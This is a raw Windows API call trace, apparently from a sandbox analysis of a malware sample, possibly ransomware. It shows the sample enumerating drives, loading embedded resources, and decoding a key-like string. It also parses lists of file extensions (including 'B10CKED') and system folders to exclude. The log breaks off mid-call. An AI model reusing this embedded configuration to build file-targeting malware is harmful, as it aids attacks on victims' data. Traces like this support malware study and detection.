GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0099.873] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0099.873] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0099.873] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0099.873] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0099.874] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0099.875] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0099.875] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0099.875] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0099.875] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0099.875] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0099.876] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0099.876] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0099.876] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0099.877] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0099.877] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0099.877] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0099.877] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0099.877] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0099.877] FindResourceW (hModule=0x400000, lpName="NDNF", lpType=0xa) returned 0x51c420 [0099.877] LoadResource (hModule=0x400000, hResInfo=0x51c420) returned 0x516824 [0099.877] SizeofResource (hModule=0x400000, hResInfo=0x51c420) returned 0x267 [0099.877] LockResource (hResData=0x516824) returned 0x516824 [0099.877] FreeResource (hResData=0x516824) returned 0 [0099.877] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0099.878] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0099.878] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0099.878] LockResource (hResData=0x50d64c) returned 0x50d64c [0099.878] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1521cc8, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0099.878] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1521cc8, cbMultiByte=38, lpWideCharStr=0x14fdeac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0099.878] FreeResource (hResData=0x50d64c) returned 0 [0099.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0099.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1521ccc, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0099.878] GetCurrentThreadId () returned 0xc18 [0099.878] GetCurrentThreadId () returned 0xc18 [0099.878] GetCurrentThreadId () returned 0xc18 [0099.878] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14bee18, cbMultiByte=615, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 615 [0099.878] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14bee18, cbMultiByte=615, lpWideCharStr=0x14c4f7c, cchWideChar=615 | out: lpWideCharStr="[NF_START]\r\nAST\r\nAFN\r\nELST\r\nEXE\r\nLNK\r\nHTA\r\nPEK\r\nSEK\r\nB10CKED\r\nTMP\r\nICO\r\n000\r\nSYS\r\nDAT\r\nRTF\r\nINF\r\nDLL\r\nDAT\r\nREG\r\nDRV\r\nDEV\r\nPIF\r\nMBR\r\nINI\r\nXML\r\nLIST\r\nTTF\r\nLOG\r\nJA\r\nCOM\r\nBAT\r\nCMD\r\nVBS\r\nJS\r\nCFG\r\nDOWNLOAD\r\nNFO\r\nMSI\r\nCHK\r\nDMP\r\nMUI\r\nDUN\r\nISP\r\nISW\r\nCAB\r\nEFI\r\nHLP\r\nMSU\r\nHLP\r\nBIN\r\nLNG\r\nTORRENT_INFO\r\nTORRENT\r\nHTM\r\nHTML\r\nCHM\r\nLANG\r\nSTYLE\r\nMP3\r\nFLAC\r\nOGG\r\nWMA\r\nGIF\r\nJAVA\r\nCUR\r\nANI\r\n[NF_END]\r\n[ND_START]\r\n\\WINDOWS\r\n\\PROGRAM FILES\r\n\\GAMES\r\n\\APPDATA\\\r\n\\APPLICATION DATA\\\r\n\\LOCAL SETTINGS\\\r\n\\TEMP\\\r\n\\PROGRAMDATA\\\r\n\\BOOT\\\r\n\\MSOCACHE\\\r\n\\DEFAULT USER\\\r\n\\SAMPLE\r\n\\EXAMPLE\r\n\\I386\r\n\\TEMPORARY\r\n\\TOR BROWSER\\\r\n\\BROWSER\r\nBROWSER\\\r\n[ND_END]") returned 615 [0099.878] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_START]", cchCount2=10) returned 2 [0099.878] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.878] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.878] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.878] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.878] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.878] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.878] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.878] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.878] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.878] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.878] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.878] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.878] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 2 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 2 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, 